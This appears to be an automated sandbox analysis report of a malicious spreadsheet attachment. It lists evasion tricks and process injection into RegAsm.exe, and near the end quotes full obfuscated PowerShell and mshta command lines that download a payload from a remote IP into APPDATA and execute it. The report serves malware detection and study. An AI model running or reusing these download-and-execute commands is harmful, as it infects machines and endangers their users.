                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                Source: RFQ_0230909024SEPT.xla.xlsxStream path 'Workbook' entropy: 7.99564397201 (max. 8.0)
                Source: B3930000.0.drStream path 'Workbook' entropy: 7.99577900888 (max. 8.0)

                Malware Analysis System Evasion

                barindex
                Delayed program exit found
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040F7E2 Sleep,ExitProcess,17_2_0040F7E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A7D9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1919Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8039Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 895Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1612Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1240Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4479Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_17-53714
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.dllJump to dropped file
                Source: C:\Windows\System32\mshta.exe TID: 3524Thread sleep time: -480000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep count: 1919 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep count: 8039 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep count: 1240 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 4479 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -3600000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4016Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4076Thread sleep time: -42000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2148Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2864Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044E8F9 FindFirstFileExA,17_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,26_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00418981 memset,GetSystemInfo,21_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,17_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00443355 mov eax, dword ptr fs:[00000030h]17_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10004AB4 mov eax, dword ptr fs:[00000030h]17_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,17_2_00411D39
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434BD8 SetUnhandledExceptionFilter,17_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0043BB71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3852, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Bypasses PowerShell execution policy
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Contains functionality to inject code into remote processes
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,17_2_0041812A
                Injects a PE file into a foreign processes
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419662 mouse_event,17_2_00419662
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))"Jump to behavior
